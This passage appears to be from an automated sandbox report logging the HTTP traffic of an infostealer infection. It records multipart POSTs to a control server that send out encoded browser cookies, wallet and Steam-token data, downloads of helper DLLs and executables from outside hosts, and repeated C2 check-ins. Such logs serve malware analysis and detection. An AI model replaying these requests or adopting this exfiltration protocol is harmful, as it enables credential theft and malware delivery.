------HIJJEGDBFIIDGCAKJEBKContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------HIJJEGDBFIIDGCAKJEBKContent-Disposition: form-data; name="message"fplugins------HIJJEGDBFIIDGCAKJEBK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAECHost: 85.28.47.30Content-Length: 6143Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 85.28.47.30Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 
4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGHDGCFHIDBGDGIIIEHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 48 44 47 43 46 48 49 44 42 47 44 47 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 48 44 47 43 46 48 49 44 42 47 44 47 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 48 44 47 43 46 48 49 44 42 47 44 47 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 48 44 47 43 46 48 49 44 42 47 44 47 49 49 49 45 2d 2d 0d 0a Data Ascii: ------BFBGHDGCFHIDBGDGIIIEContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------BFBGHDGCFHIDBGDGIIIEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BFBGHDGCFHIDBGDGIIIEContent-Disposition: form-data; name="file"------BFBGHDGCFHIDBGDGIIIE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECAHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 2d 2d 0d 0a Data Ascii: ------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file"------GHDBKFHIJKJKECAAAECA--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCAHost: 85.28.47.30Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 2d 2d 0d 0a Data Ascii: ------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="message"wallets------KKECFIEBGCAKJKECGCFI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: 85.28.47.30Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"files------KJJKEBGHJKFIDGCAAFCA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFIEBGCAAFIEBFCAEHost: 85.28.47.30Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 49 45 42 47 43 41 41 46 49 45 42 46 43 41 45 2d 2d 0d 0a Data Ascii: ------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GCBKFIEBGCAAFIEBFCAEContent-Disposition: form-data; name="file"------GCBKFIEBGCAAFIEBFCAE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIEHost: 85.28.47.30Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 41 41 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 2d 2d 0d 0a Data Ascii: ------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------FBAAAKFCAFIIDHIDGHIEContent-Disposition: form-data; name="message"jbdtaijovg------FBAAAKFCAFIIDHIDGHIE--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBHost: 85.28.47.30Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 46 36 41 36 32 38 32 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 2d 2d 0d 0a Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="hwid"18EF6A6282E5845770397------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="build"Nice------CBFCBKKFBAEHJKEBKFCB--
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000007001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: 